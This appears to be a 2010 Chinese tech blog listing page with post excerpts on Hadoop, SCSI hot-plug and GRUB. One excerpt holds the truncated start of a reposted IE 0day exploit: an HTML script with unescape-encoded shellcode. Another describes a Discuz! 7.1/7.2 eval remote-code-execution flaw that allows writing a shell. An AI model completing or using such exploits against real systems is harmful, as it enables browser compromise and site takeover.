Discuz! 7.1 & 7.2
天行健,君子以自强不息;
地势坤,君子以厚德载物;
传说中的IE 0day
作者:曲文庆 日期:2010-01-19 08:55
影响IE6-IE8全系列,传说中Google“被入侵”所用到的那份。
<html><script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3
标签: 转载,ie,0day
Hadoop
作者:曲文庆 日期:2010-01-11 10:34
Hadoop 
项目主页:http://hadoop.apache.org
一个分布式系统基础架构,由Apache基金会开发。用户可以在不了解分布式底层细节的情况下,开发分布式程序。充分利用集群的威力高速运算和存储。
起源:Google的集群系统
Google的数据中心使用廉价的Linux PC机组成集群,在上面运行各种应用。即使是分布式开发的新手也可以迅速使用Google的基础设施。核心组件是3个:
1、GFS(Google File System)。一个分布式文件系统,隐藏下层负载均衡,冗余复制等细节,对上层程序提供一个统一的文件系统API接口。Googl
一个分布式系统基础架构,由Apache基金会开发。用户可以在不了解分布式底层细节的情况下,开发分布式程序。充分利用集群的威力高速运算和存储。
起源:Google的集群系统
Google的数据中心使用廉价的Linux PC机组成集群,在上面运行各种应用。即使是分布式开发的新手也可以迅速使用Google的基础设施。核心组件是3个:
1、GFS(Google File System)。一个分布式文件系统,隐藏下层负载均衡,冗余复制等细节,对上层程序提供一个统一的文件系统API接口。Googl
标签: Hadoop
Discuz! 7.1 & 7.2 远程代码执行漏洞
作者:曲文庆 日期:2010-01-07 12:40
转载自:http://www.sebug.net/vulndb/15198
SSV ID:15198
SEBUG-Appdir:Discuz!
发布时间:2010-01-06
影响版本:
漏洞描述:
产生漏洞的$scriptlang数组在安装插件后已经初始化
Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。
下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:
一、漏洞来自showmessage函数:
function showmessage(
产生漏洞的$scriptlang数组在安装插件后已经初始化
Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。
下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:
一、漏洞来自showmessage函数:
function showmessage(
Linux系统下实现SCSI硬盘热插拔及在线识别
作者:曲文庆 日期:2010-01-06 16:51
在向服务器添加SCSI硬盘时,可以在服务器不停机的情况下,让系统识别出新插入的硬盘,具体步骤如下:
第一步:将新硬盘插到机器上;
第二步:以root用户运行命令:
echo "scsi add-single-device x y z u" > /proc/scsi/scsi
其中:
x是硬盘所在SCSI控制器号(一般机器就一个SCSI控制器,所以就是0);
y是硬盘所在SCSI通道的编号(一般单通道的就是0,多通道的要看是哪个通道了);
z是硬盘的SCSI ID号(可以通过具体插入的硬盘插槽来判断);
u是硬盘的lun号(默认情况都是0)
由于我是插入第三块硬盘,所以我运行的命令是:
e
grub再熟悉
作者:曲文庆 日期:2010-01-06 16:49
一、GRUB 简介
系统启动引导管理器,是在计算机启动后运行的第一个程序,他是用来负责加载、传输控制到操作系统的内核,一旦把内核挂载,系统引导管理器的任务就算完成退出,系统引导的其它部份,比如系统的初始化及启动过程则完全由内核来控制完成。
二、GRUB软件包版安装
在linux系统中查看有没有安装grub-0.97-13.2包,如过没有安装此包,那么可以在光盘中找到grub-0.97-13.2进行安装即可。一般在安装完系统后该包已经被安装到系统中。如果没有rpm包可以下载tar包进行编译安装。(grub-0.97-13.2是安装grub到mbr中的工具包)
[root@rhel5 ~]# rpm -
标签: Grub